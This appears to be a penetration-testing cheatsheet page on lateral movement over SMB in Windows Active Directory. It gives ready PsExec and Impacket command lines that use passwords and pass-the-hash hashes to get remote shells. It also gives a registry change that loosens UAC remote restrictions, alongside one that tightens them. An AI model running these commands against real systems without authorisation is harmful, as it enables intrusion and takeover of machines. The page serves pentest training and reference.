cheatsheet
  • Introduction
  • Internal Pentest
    • Active Directory
      • Reconnaissance
        • Find Domain Name
        • Find Domain Controllers
        • Enumerating Machines
        • Enumerating Services
        • DNS Enumeration
      • Exploitation
        • Exploit Without Account
          • SMB Relay
        • Exploit With Account
          • Kerberoast Attack
      • Post-Exploitation
        • Extracting Credentials
          • Retrieve Windows passwords
          • Retrieve Windows hashes
        • Maintening Access
          • Adding Local Administrator
        • Lateral Movement
          • SMB protocol
Powered by GitBook
On this page
  • Introduction
  • Requirements
  • Definitions
  • UAC remote restrictions
  • Tools
  • PsExec
  • WmiExec
  • AtExec
  • SmbExec
  • References
  1. Internal Pentest
  2. Active Directory
  3. Post-Exploitation
  4. Lateral Movement

SMB protocol

This page deals with lateral movement using smb protocol.

Introduction

Lateral movement consists of techniques that enable an attacker to access and control remote systems. SMB protocol is a well known candidate for this purpose.

Requirements

Definitions

There are 5 types of users:

  • Local users

    • With admin privileges on the machine

      • RID500

      • Non-RID500

    • Without admin privileges on the machine

  • Domain users

    • With admin privileges on machines

    • Without admin privileges on machines

RID500 is the built-in local admin account used for installing or recovering purpose (usually named Administrator).

UAC remote restrictions

  • Local admin privileges are required to WmiExec or PsExec

  • Non-RID 500 local admin accounts cannot WmiExec or PsExec on WinVista+ machines

  • Domain users with admin privileges on machine can

  • RID 500 local admin account can WmiExec or PsExec on machines

PsExec, WmiExec, SmbExec, AtExec, etc.

Local users

No

Local admins

No

Local admin RID 500

Yes

Domain users without local admin privileges

No

Domain users with local admin privileges

Yes

To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:

  • reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1

To prevent RID 500 from being able to WmiExec or PsExec, execute:

  • reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1

Tools

PsExec

On Windows, use Sysinternal's PsExec:

PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd"
PsExec64.exe \\192.168.10.60 -accepteula -s -u localadmin -p b26906d7457cbe74931011c3c5d1ac92 "cmd"

On Kali, use Impacket's PsExec:

psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd"
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd"

WmiExec

On Kali, use Impacket's WmiExec:

wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

AtExec

On Kali, use Impacket's AtExec:

atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"

SmbExec

On Kali, use Impacket's SmbExec:

smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60

References

PreviousLateral Movement

Last updated 5 years ago

Judging from and , we can say following things:

microsoft
harmj0y
microsoft
harmj0y